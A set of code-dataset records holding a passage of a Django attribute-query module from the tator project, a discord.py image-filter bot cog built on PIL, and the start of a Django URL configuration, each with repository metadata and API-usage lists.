_ = _get_field_for_attribute(\n typeObject, attributeType[\"name\"]\n )\n\n annotateField[\"tator_user_sections\"] = TextField\n attributeCast[\"tator_user_sections\"] = lambda x: f'\"{x}\"'\n for key in [\"$x\", \"$y\", \"$u\", \"$v\", \"$width\", \"$height\", \"$fps\"]:\n attributeCast[key] = float\n for key in [\n \"$version\",\n \"$user\",\n \"$type\",\n \"$created_by\",\n \"$modified_by\",\n \"$frame\",\n \"$num_frames\",\n \"$section\",\n \"$id\",\n ]:\n attributeCast[key] = int\n for key in [\n \"$created_datetime\",\n \"$modified_datetime\",\n \"$name\",\n \"$archive_state\",\n \"$elemental_id\",\n ]:\n attributeCast[key] = str\n\n q_object, required_annotations = build_query_recursively(\n query_object, attributeCast, is_media, qs[0].project, set()\n )\n\n logger.info(f\"Q_Object = {q_object}\")\n logger.info(f\"Query requires the following annotations: {required_annotations}\")\n for annotation in required_annotations:\n logger.info(f\"\\t {annotation} to {annotateField[annotation]()}\")\n if annotateField[annotation] == DateTimeField:\n # Cast DateTime to text first\n qs = qs.annotate(\n **{\n f\"casted_{_sanitize(annotation)}_text\": Cast(\n F(f\"attributes__{annotation}\"), TextField()\n )\n }\n )\n qs = qs.annotate(\n **{\n f\"casted_{_sanitize(annotation)}\": Cast(\n F(f\"casted_{_sanitize(annotation)}_text\"),\n annotateField[annotation](),\n )\n }\n )\n else:\n qs = qs.annotate(\n **{\n f\"casted_{_sanitize(annotation)}\": Cast(\n F(f\"attributes__{annotation}\"), annotateField[annotation]()\n )\n 
}\n )\n return qs.filter(q_object)\n\n\ndef get_attribute_psql_queryset(entity_type, qs, params, filter_ops):\n attribute_null = params.get(\"attribute_null\", [])\n float_queries = params.get(\"float_array\", [])\n\n # return original queryset if no queries were supplied\n if not (filter_ops or float_queries or attribute_null):\n return qs\n\n found_queryset = False\n for key, value, op in filter_ops:\n if key.startswith(\"$\"):\n db_field = key[1:]\n qs = qs.filter(**{f\"{db_field}{OPERATOR_SUFFIXES[op]}\": value})\n found_queryset = True\n else:\n field_type, _ = _get_field_for_attribute(entity_type, key)\n if field_type:\n # Annotate with a typed object prior to query to ensure index usage\n alias_key = re.sub(r\"[^\\w]\", \"__\", key)\n if field_type == PointField:\n qs = qs.annotate(\n **{f\"{alias_key}_0_float\": Cast(f\"attributes__{key}__0\", FloatField())}\n )\n qs = qs.annotate(\n **{f\"{alias_key}_1_float\": Cast(f\"attributes__{key}__1\", FloatField())}\n )\n qs = qs.annotate(\n **{\n f\"{alias_key}_typed\": Cast(\n Func(\n F(f\"{alias_key}_0_float\"),\n F(f\"{alias_key}_1_float\"),\n function=\"ST_MakePoint\",\n ),\n PointField(srid=4326),\n )\n }\n )\n qs = qs.filter(**{f\"{alias_key}_typed{OPERATOR_SUFFIXES[op]}\": value})\n elif field_type == DateTimeField:\n qs = qs.annotate(\n **{f\"{alias_key}_text\": Cast(f\"attributes__{key}\", CharField())}\n )\n qs = qs.annotate(\n **{f\"{alias_key}_typed\": Cast(f\"{alias_key}_text\", DateTimeField())}\n )\n qs = qs.filter(**{f\"{alias_key}_typed{OPERATOR_SUFFIXES[op]}\": value})\n elif field_type == CharField or field_type == EnumField:\n qs = qs.annotate(\n **{f\"{alias_key}_typed\": Cast(f\"attributes__{key}\", field_type())}\n )\n if OPERATOR_SUFFIXES[op]:\n qs = qs.filter(**{f\"{alias_key}_typed{OPERATOR_SUFFIXES[op]}\": value})\n else:\n # BUG: database_qs mangles the SQL and requires this workaround:\n # This is only on equal for some reason.\n qs = qs.filter(\n **{f\"{alias_key}_typed{OPERATOR_SUFFIXES[op]}\": f'\"{value}\"'}\n )\n else:\n qs = qs.annotate(\n **{f\"{alias_key}_typed\": Cast(f\"attributes__{key}\", field_type())}\n )\n qs = qs.filter(**{f\"{alias_key}_typed{OPERATOR_SUFFIXES[op]}\": value})\n found_queryset = True\n\n if attribute_null is not None:\n for kv in attribute_null:\n key, value = kv.split(KV_SEPARATOR)\n value = _convert_boolean(value)\n if value:\n qs = qs.filter(\n Q(**{f\"attributes__contains\": {key: None}})\n | ~Q(**{f\"attributes__has_key\": key})\n )\n else:\n # Returns true if the attributes both have a key and it is not set to null\n qs = qs.filter(**{f\"attributes__has_key\": key})\n qs = qs.filter(~Q(**{f\"attributes__contains\": {key: None}}))\n found_queryset = True\n\n for query in float_queries:\n if \"type\" not in params:\n raise Exception(\"Must supply 'type' if supplying a float_query.\")\n logger.info(f\"EXECUTING FLOAT QUERY={query}\")\n found_queryset = True\n name = query[\"name\"]\n center = query[\"center\"]\n upper_bound = query.get(\"upper_bound\", None)\n lower_bound = query.get(\"lower_bound\", None)\n metric = query.get(\"metric\", \"l2norm\")\n order = query.get(\"order\", \"asc\")\n field_type, size = _get_field_for_attribute(entity_type, name)\n if field_type:\n found_queryset = True\n qs = qs.filter(type=params[\"type\"])\n qs = qs.annotate(**{f\"{name}_char\": Cast(f\"attributes__{name}\", CharField())})\n qs = qs.annotate(\n **{f\"{name}_typed\": Cast(f\"{name}_char\", VectorField(dimensions=size))}\n )\n if metric == \"l2norm\":\n qs = 
qs.annotate(**{f\"{name}_distance\": L2Distance(f\"{name}_typed\", center)})\n elif metric == \"cosine\":\n qs = qs.annotate(**{f\"{name}_distance\": CosineDistance(f\"{name}_typed\", center)})\n elif metric == \"ip\":\n qs = qs.annotate(**{f\"{name}_distance\": MaxInnerProduct(f\"{name}_typed\", center)})\n\n if upper_bound:\n qs = qs.filter(**{f\"{name}_distance__lte\": upper_bound})\n if lower_bound:\n qs = qs.filter(**{f\"{name}_distance__gte\": lower_bound})\n if order == \"asc\":\n qs = qs.order_by(f\"{name}_distance\")\n else:\n qs = qs.order_by(f\"-{name}_distance\")\n\n return qs if found_queryset else None\n", "repo_name": "cvisionai/tator", "sub_path": "api/main/rest/_attribute_query.py", "file_name": "_attribute_query.py", "file_ext": "py", "file_size_in_byte": 22068, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 88, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 44, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 68, "usage_type": "call"}, {"api_name": "django.db.models.functions.Cast", "line_number": 73, "usage_type": "call"}, {"api_name": "django.db.models.F", "line_number": 73, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 73, "usage_type": "call"}, {"api_name": "models.StateType.objects.filter", "line_number": 99, "usage_type": "call"}, {"api_name": "models.StateType.objects", "line_number": 99, "usage_type": "attribute"}, {"api_name": "models.StateType", "line_number": 99, "usage_type": "name"}, {"api_name": "models.LocalizationType.objects.filter", "line_number": 100, "usage_type": "call"}, {"api_name": "models.LocalizationType.objects", "line_number": 100, "usage_type": "attribute"}, {"api_name": "models.LocalizationType", "line_number": 100, "usage_type": "name"}, {"api_name": "models.State.objects.filter", "line_number": 105, "usage_type": "call"}, {"api_name": "models.State.objects", "line_number": 105, "usage_type": "attribute"}, {"api_name": "models.State", "line_number": 105, "usage_type": "name"}, {"api_name": "models.Localization.objects.filter", "line_number": 112, "usage_type": "call"}, {"api_name": "models.Localization.objects", "line_number": 112, "usage_type": "attribute"}, {"api_name": "models.Localization", "line_number": 112, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 140, "usage_type": "call"}, {"api_name": "django.db.models.OuterRef", "line_number": 141, "usage_type": "call"}, {"api_name": "django.db.models.Subquery", "line_number": 143, "usage_type": "call"}, {"api_name": "django.db.models.functions.Greatest", "line_number": 145, "usage_type": "call"}, {"api_name": "django.db.models.Value", "line_number": 149, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.BooleanField", "line_number": 200, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.BigIntegerField", "line_number": 201, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.FloatField", "line_number": 202, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 203, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 204, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.DateTimeField", "line_number": 205, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PointField", "line_number": 206, "usage_type": "name"}, {"api_name": "pgvector.django.VectorField", "line_number": 207, 
"usage_type": "name"}, {"api_name": "_attributes.KV_SEPARATOR", "line_number": 215, "usage_type": "argument"}, {"api_name": "dateutil.parser.parse", "line_number": 231, "usage_type": "call"}, {"api_name": "django.contrib.gis.geos.Point", "line_number": 235, "usage_type": "call"}, {"api_name": "django.contrib.gis.measure.Distance", "line_number": 236, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 254, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 264, "usage_type": "call"}, {"api_name": "models.Section.objects.filter", "line_number": 285, "usage_type": "call"}, {"api_name": "models.Section.objects", "line_number": 285, "usage_type": "attribute"}, {"api_name": "models.Section", "line_number": 285, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 287, "usage_type": "name"}, {"api_name": "models.StateType.objects.filter", "line_number": 289, "usage_type": "call"}, {"api_name": "models.StateType.objects", "line_number": 289, "usage_type": "attribute"}, {"api_name": "models.StateType", "line_number": 289, "usage_type": "name"}, {"api_name": "models.LocalizationType.objects.filter", "line_number": 290, "usage_type": "call"}, {"api_name": "models.LocalizationType.objects", "line_number": 290, "usage_type": "attribute"}, {"api_name": "models.LocalizationType", "line_number": 290, "usage_type": "name"}, {"api_name": "models.Media.objects.filter", "line_number": 291, "usage_type": "call"}, {"api_name": "models.Media.objects", "line_number": 291, "usage_type": "attribute"}, {"api_name": "models.Media", "line_number": 291, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 310, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 312, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 314, "usage_type": "call"}, {"api_name": "dateutil.parser.parse", "line_number": 326, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 326, "usage_type": "attribute"}, {"api_name": "dateutil.parser.parse", "line_number": 328, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 328, "usage_type": "attribute"}, {"api_name": "dateutil.parser.parse", "line_number": 332, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 332, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.geos.Point", "line_number": 337, "usage_type": "call"}, {"api_name": "django.contrib.gis.measure.Distance", "line_number": 338, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 356, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 358, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 360, "usage_type": "call"}, {"api_name": "models.Media", "line_number": 376, "usage_type": "name"}, {"api_name": "models.Media", "line_number": 380, "usage_type": "name"}, {"api_name": "models.Localization", "line_number": 381, "usage_type": "name"}, {"api_name": "models.State", "line_number": 382, "usage_type": "name"}, {"api_name": "models.Leaf", "line_number": 383, "usage_type": "name"}, {"api_name": "models.File", "line_number": 384, "usage_type": "name"}, {"api_name": "models.MediaType", "line_number": 380, "usage_type": "name"}, {"api_name": "models.LocalizationType", "line_number": 381, "usage_type": "name"}, {"api_name": "models.StateType", "line_number": 382, "usage_type": "name"}, {"api_name": "models.LeafType", "line_number": 383, "usage_type": "name"}, {"api_name": "models.FileType", "line_number": 384, 
"usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 410, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.DateTimeField", "line_number": 443, "usage_type": "name"}, {"api_name": "django.db.models.functions.Cast", "line_number": 447, "usage_type": "call"}, {"api_name": "django.db.models.F", "line_number": 448, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 448, "usage_type": "call"}, {"api_name": "django.db.models.functions.Cast", "line_number": 454, "usage_type": "call"}, {"api_name": "django.db.models.F", "line_number": 455, "usage_type": "call"}, {"api_name": "django.db.models.functions.Cast", "line_number": 463, "usage_type": "call"}, {"api_name": "django.db.models.F", "line_number": 464, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 489, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.PointField", "line_number": 490, "usage_type": "name"}, {"api_name": "django.db.models.functions.Cast", "line_number": 492, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.FloatField", "line_number": 492, "usage_type": "call"}, {"api_name": "django.db.models.functions.Cast", "line_number": 495, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.FloatField", "line_number": 495, "usage_type": "call"}, {"api_name": "django.db.models.functions.Cast", "line_number": 499, "usage_type": "call"}, {"api_name": "django.db.models.Func", "line_number": 500, "usage_type": "call"}, {"api_name": "django.db.models.F", "line_number": 501, "usage_type": "call"}, {"api_name": "django.db.models.F", "line_number": 502, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.PointField", "line_number": 505, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.DateTimeField", "line_number": 510, "usage_type": "name"}, {"api_name": "django.db.models.functions.Cast", "line_number": 512, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 512, "usage_type": "call"}, {"api_name": "django.db.models.functions.Cast", "line_number": 515, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.DateTimeField", "line_number": 515, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 518, "usage_type": "name"}, {"api_name": "enumfields.EnumField", "line_number": 518, "usage_type": "name"}, {"api_name": "django.db.models.functions.Cast", "line_number": 520, "usage_type": "call"}, {"api_name": "django.db.models.functions.Cast", "line_number": 532, "usage_type": "call"}, {"api_name": "_attributes.KV_SEPARATOR", "line_number": 539, "usage_type": "argument"}, {"api_name": "django.db.models.Q", "line_number": 543, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 544, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 549, "usage_type": "call"}, {"api_name": "django.db.models.functions.Cast", "line_number": 567, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 567, "usage_type": "call"}, {"api_name": "django.db.models.functions.Cast", "line_number": 569, "usage_type": "call"}, {"api_name": "pgvector.django.VectorField", "line_number": 569, "usage_type": "call"}, {"api_name": "pgvector.django.L2Distance", "line_number": 572, "usage_type": "call"}, {"api_name": "pgvector.django.CosineDistance", "line_number": 574, "usage_type": "call"}, {"api_name": 
"pgvector.django.MaxInnerProduct", "line_number": 576, "usage_type": "call"}]} +{"seq_id": "34095665120", "text": "from PIL import Image, ImageFilter, ImageOps, ImageEnhance, ImageDraw, ImageFont\nfrom discord.ext import commands\nfrom .image_handling import get_image, send_image\n\n\ndef wrap_line(draw, font, line, width):\n # check if line already fits\n size = draw.textsize(line, font)\n if size[0] < width:\n return line, \"\"\n space = line.find(' ', 0)\n if space == -1: # There's only one word\n return line, \"\"\n # the first 'previous space', is the first space\n prev_space = space\n while space != -1:\n size = draw.textsize(line[:space], font=font)\n if size[0] >= width:\n return line[:prev_space], line[prev_space + 1:]\n prev_space = space\n space = line.find(' ', prev_space + 1)\n return line[:prev_space], line[prev_space + 1:]\n\n\ndef wrap_text(draw, font, text, width):\n result = \"\"\n for remaining_line in text.splitlines():\n if not remaining_line:\n result += \"\\n\"\n while remaining_line:\n line, remaining_line = wrap_line(draw, font, remaining_line, width)\n result += line\n result += '\\n'\n return result.rstrip()\n\n\ndef blur(image):\n return image.filter(ImageFilter.BLUR)\n\n\ndef invert(image):\n try:\n alpha = image.getchannel('A')\n except ValueError:\n alpha = None\n image = image.convert(\"RGB\")\n image = ImageOps.invert(image)\n if alpha:\n image.putalpha(alpha)\n return image\n\n\ndef flipv(image):\n return ImageOps.flip(image)\n\n\ndef fliph(image):\n return ImageOps.mirror(image)\n\n\ndef symm(image, side='left'):\n w, h = image.size\n if side == 'left':\n crop = image.crop((0, 0, w // 2, h))\n crop = ImageOps.mirror(crop)\n image.paste(crop, (round(w / 2 + 0.1), 0))\n elif side == 'right':\n crop = image.crop((round(w / 2 + 0.1), 0, w, h))\n crop = ImageOps.mirror(crop)\n image.paste(crop, (0, 0))\n elif side == 'up':\n crop = image.crop((0, 0, w, h // 2))\n crop = ImageOps.flip(crop)\n image.paste(crop, (0, round(h / 2 + 0.1)))\n elif side == 'down':\n crop = image.crop((0, round(h / 2 + 0.1), w, h))\n crop = ImageOps.flip(crop)\n image.paste(crop, (0, 0))\n return image\n\n\ndef posterize(image):\n try:\n alpha = image.getchannel('A')\n except ValueError:\n alpha = None\n image = image.convert(\"RGB\")\n image = ImageOps.posterize(image, 2)\n if alpha:\n image.putalpha(alpha)\n return image\n\n\ndef shrink(image, per=5):\n image = image.convert(\"RGBA\")\n w = image.width * per // 100\n h = image.height * per // 100\n image = image.resize((w, h), resample=Image.LANCZOS)\n return image\n\n\ndef glitch(image):\n w, h = image.width, image.height\n image = image.resize((int(w ** .75), int(h ** .75)), resample=Image.LANCZOS)\n image = image.resize((int(w ** .88), int(h ** .88)), resample=Image.BILINEAR)\n image = image.resize((int(w ** .9), int(h ** .9)), resample=Image.BICUBIC)\n image = image.resize((w, h), resample=Image.BICUBIC)\n try:\n alpha = image.getchannel('A')\n except ValueError:\n alpha = None\n image = image.convert(\"RGB\")\n image = ImageOps.posterize(image, 4)\n if alpha:\n image.putalpha(alpha)\n image = ImageEnhance.Sharpness(image).enhance(100.0)\n return image\n\n\ndef edges(image):\n try:\n alpha = image.getchannel('A')\n except ValueError:\n alpha = None\n image = image.filter(ImageFilter.SMOOTH)\n image = image.filter(ImageFilter.CONTOUR)\n image = image.convert(\"RGB\")\n image = ImageOps.invert(image)\n image = ImageOps.grayscale(image)\n image = image.convert(\"RGBA\")\n if alpha:\n image.putalpha(alpha)\n return image\n\n\ndef 
rotate(image, rotation='right'):\n if rotation == 'left':\n return image.transpose(Image.ROTATE_90)\n else:\n return image.transpose(Image.ROTATE_270)\n\n\ndef transparent(image):\n image = image.convert(\"RGBA\")\n alpha = image.getchannel('A')\n p = 0\n for (r, g, b, a) in image.getdata():\n if abs(r-g) + abs(g-b) < 10:\n x = p % alpha.width\n y = p // alpha.width\n if a > 255 - min(r, g, b):\n alpha.putpixel((x, y), 255 - min(r, g, b))\n p += 1\n image.putalpha(alpha)\n return image\n\n\ndef grayscale(image):\n try:\n alpha = image.getchannel('A')\n except ValueError:\n alpha = None\n image = ImageOps.grayscale(image)\n image = image.convert(\"RGBA\")\n if alpha:\n image.putalpha(alpha)\n return image\n\n\nfilters = {\n 'blur': blur,\n 'invert': invert,\n 'flipv': flipv,\n 'fliph': fliph,\n 'posterize': posterize,\n 'glitch': glitch,\n 'edges': edges,\n 'transparent': transparent,\n 'grayscale': grayscale,\n}\n\nadvanced_filters = {\n 'symm': symm,\n 'shrink': shrink,\n 'rotate': rotate,\n}\n\n\nclass Filters(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n\n @commands.command(aliases=list(filters))\n async def filter(self, ctx):\n filter_name = ctx.invoked_with\n if filter_name == 'filter':\n return\n image, image_message = await get_image(ctx)\n if not image:\n return\n\n image = filters[filter_name](image)\n\n await send_image(ctx, image, image_message)\n\n\n @commands.command()\n async def symm(self, ctx, side: str = \"left\"):\n side = side.lower()\n if side not in ('left', 'right', 'top', 'bottom'):\n return await ctx.send(\"Valid sides are 'left', 'right', 'top', and 'bottom'.\")\n image, image_message = await get_image(ctx)\n if not image:\n return\n\n w, h = image.size\n if side == 'left':\n crop = image.crop((0, 0, w//2, h))\n crop = ImageOps.mirror(crop)\n image.paste(crop, (round(w / 2 + 0.1), 0))\n elif side == 'right':\n crop = image.crop((round(w / 2 + 0.1), 0, w, h))\n crop = ImageOps.mirror(crop)\n image.paste(crop, (0, 0))\n elif side == 'top':\n crop = image.crop((0, 0, w, h//2))\n crop = ImageOps.flip(crop)\n image.paste(crop, (0, round(h / 2 + 0.1)))\n elif side == 'bottom':\n crop = image.crop((0, round(h / 2 + 0.1), w, h))\n crop = ImageOps.flip(crop)\n image.paste(crop, (0, 0))\n\n await send_image(ctx, image, image_message)\n\n\n @commands.command()\n async def shrink(self, ctx, per: int = 5):\n if not (1 <= per <= 99):\n return await ctx.send(\"Percentage must be between 1 and 99\")\n image, image_message = await get_image(ctx)\n if not image:\n return\n image = image.convert(\"RGBA\")\n w = image.width * per // 100\n h = image.height * per // 100\n image = image.resize((w, h), resample=Image.LANCZOS)\n\n await send_image(ctx, image, image_message)\n\n\n @commands.command()\n async def rotate(self, ctx, rotation: str = 'right'):\n rotation = rotation.lower()\n if rotation not in ('left', 'right'):\n return await ctx.send(\"Rotation must be 'left' or 'right'.\")\n image, image_message = await get_image(ctx)\n if not image:\n return\n\n if rotation == 'left':\n image = image.transpose(Image.ROTATE_90)\n else:\n image = image.transpose(Image.ROTATE_270)\n\n await send_image(ctx, image, image_message)\n\n\n @commands.command()\n async def impact(self, ctx, *, text: str):\n image, image_message = await get_image(ctx)\n if not image:\n return\n\n font_size = image.width // 10\n try:\n font = ImageFont.truetype(font=\"fonts/impact.ttf\", size=font_size)\n except IOError:\n return await ctx.send(\"Couldn't open the font.\")\n draw = 
ImageDraw.Draw(image)\n text = wrap_text(draw, font, text, image.width)\n text_size = draw.textsize(text, font)\n x, y = ((image.width - text_size[0]) // 2, 3)\n\n radius = font_size // 20\n draw.text((x-radius, y-radius), text, font=font, fill=(0, 0, 0, 255), align=\"center\")\n draw.text((x-radius, y+radius), text, font=font, fill=(0, 0, 0, 255), align=\"center\")\n draw.text((x+radius, y-radius), text, font=font, fill=(0, 0, 0, 255), align=\"center\")\n draw.text((x+radius, y+radius), text, font=font, fill=(0, 0, 0, 255), align=\"center\")\n\n draw.text((x, y), text, font=font, align=\"center\")\n\n await send_image(ctx, image, image_message)\n\n\ndef setup(bot):\n bot.add_cog(Filters(bot))\n", "repo_name": "Nickneim/discord-monarchbot", "sub_path": "cogs/filters.py", "file_name": "filters.py", "file_ext": "py", "file_size_in_byte": 8607, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PIL.ImageFilter.BLUR", "line_number": 38, "usage_type": "attribute"}, {"api_name": "PIL.ImageFilter", "line_number": 38, "usage_type": "name"}, {"api_name": "PIL.ImageOps.invert", "line_number": 47, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 47, "usage_type": "name"}, {"api_name": "PIL.ImageOps.flip", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 54, "usage_type": "name"}, {"api_name": "PIL.ImageOps.mirror", "line_number": 58, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 58, "usage_type": "name"}, {"api_name": "PIL.ImageOps.mirror", "line_number": 65, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 65, "usage_type": "name"}, {"api_name": "PIL.ImageOps.mirror", "line_number": 69, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 69, "usage_type": "name"}, {"api_name": "PIL.ImageOps.flip", "line_number": 73, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 73, "usage_type": "name"}, {"api_name": "PIL.ImageOps.flip", "line_number": 77, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 77, "usage_type": "name"}, {"api_name": "PIL.ImageOps.posterize", "line_number": 88, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 88, "usage_type": "name"}, {"api_name": "PIL.Image.LANCZOS", "line_number": 98, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 98, "usage_type": "name"}, {"api_name": "PIL.Image.LANCZOS", "line_number": 104, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 104, "usage_type": "name"}, {"api_name": "PIL.Image.BILINEAR", "line_number": 105, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 105, "usage_type": "name"}, {"api_name": "PIL.Image.BICUBIC", "line_number": 106, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 106, "usage_type": "name"}, {"api_name": "PIL.Image.BICUBIC", "line_number": 107, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 107, "usage_type": "name"}, {"api_name": "PIL.ImageOps.posterize", "line_number": 113, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 113, "usage_type": "name"}, {"api_name": "PIL.ImageEnhance.Sharpness", "line_number": 116, "usage_type": "call"}, {"api_name": "PIL.ImageEnhance", "line_number": 116, "usage_type": "name"}, {"api_name": "PIL.ImageFilter.SMOOTH", "line_number": 125, "usage_type": "attribute"}, {"api_name": "PIL.ImageFilter", "line_number": 125, "usage_type": "name"}, 
{"api_name": "PIL.ImageFilter.CONTOUR", "line_number": 126, "usage_type": "attribute"}, {"api_name": "PIL.ImageFilter", "line_number": 126, "usage_type": "name"}, {"api_name": "PIL.ImageOps.invert", "line_number": 128, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 128, "usage_type": "name"}, {"api_name": "PIL.ImageOps.grayscale", "line_number": 129, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 129, "usage_type": "name"}, {"api_name": "PIL.Image.ROTATE_90", "line_number": 138, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 138, "usage_type": "name"}, {"api_name": "PIL.Image.ROTATE_270", "line_number": 140, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 140, "usage_type": "name"}, {"api_name": "PIL.ImageOps.grayscale", "line_number": 163, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 163, "usage_type": "name"}, {"api_name": "discord.ext.commands.Cog", "line_number": 189, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 189, "usage_type": "name"}, {"api_name": "image_handling.get_image", "line_number": 200, "usage_type": "call"}, {"api_name": "image_handling.send_image", "line_number": 206, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 195, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 195, "usage_type": "name"}, {"api_name": "image_handling.get_image", "line_number": 214, "usage_type": "call"}, {"api_name": "PIL.ImageOps.mirror", "line_number": 221, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 221, "usage_type": "name"}, {"api_name": "PIL.ImageOps.mirror", "line_number": 225, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 225, "usage_type": "name"}, {"api_name": "PIL.ImageOps.flip", "line_number": 229, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 229, "usage_type": "name"}, {"api_name": "PIL.ImageOps.flip", "line_number": 233, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 233, "usage_type": "name"}, {"api_name": "image_handling.send_image", "line_number": 236, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 209, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 209, "usage_type": "name"}, {"api_name": "image_handling.get_image", "line_number": 243, "usage_type": "call"}, {"api_name": "PIL.Image.LANCZOS", "line_number": 249, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 249, "usage_type": "name"}, {"api_name": "image_handling.send_image", "line_number": 251, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 239, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 239, "usage_type": "name"}, {"api_name": "image_handling.get_image", "line_number": 259, "usage_type": "call"}, {"api_name": "PIL.Image.ROTATE_90", "line_number": 264, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 264, "usage_type": "name"}, {"api_name": "PIL.Image.ROTATE_270", "line_number": 266, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 266, "usage_type": "name"}, {"api_name": "image_handling.send_image", "line_number": 268, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 254, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 254, "usage_type": "name"}, {"api_name": "image_handling.get_image", 
"line_number": 273, "usage_type": "call"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 279, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 279, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 282, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 282, "usage_type": "name"}, {"api_name": "image_handling.send_image", "line_number": 295, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 271, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 271, "usage_type": "name"}]} +{"seq_id": "22473132756", "text": "\"\"\"\nBase urlpatterns.\n\"\"\"\n\n# Django\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path, include\n\n\nurlpatterns = [\n # Admin\n path(\n 'admin/doc/',\n include('django.contrib.admindocs.urls')\n ),\n\n path(\n 'admin/',\n admin.site.urls\n ),\n\n # UI\n path(\n '',\n include(\n ('ui.urls', 'ui'),\n namespace='ui'\n )\n ),\n\n # Services\n path(\n 'services/',\n include(\n ('api.services.urls', 'services'),\n namespace='services'\n )\n ),\n\n # Auths\n path(\n 'auth/',\n include(\n ('api.auths.urls', 'auth'),\n namespace='auth'\n )\n )\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n# Handle request errors\nhandler400 = 'back.views.handler400'\n\nhandler403 = 'back.views.handler403'\n\nhandler404 = 'back.views.handler404'\n", "repo_name": "ignite7/backproject", "sub_path": "back/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 993, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.include", 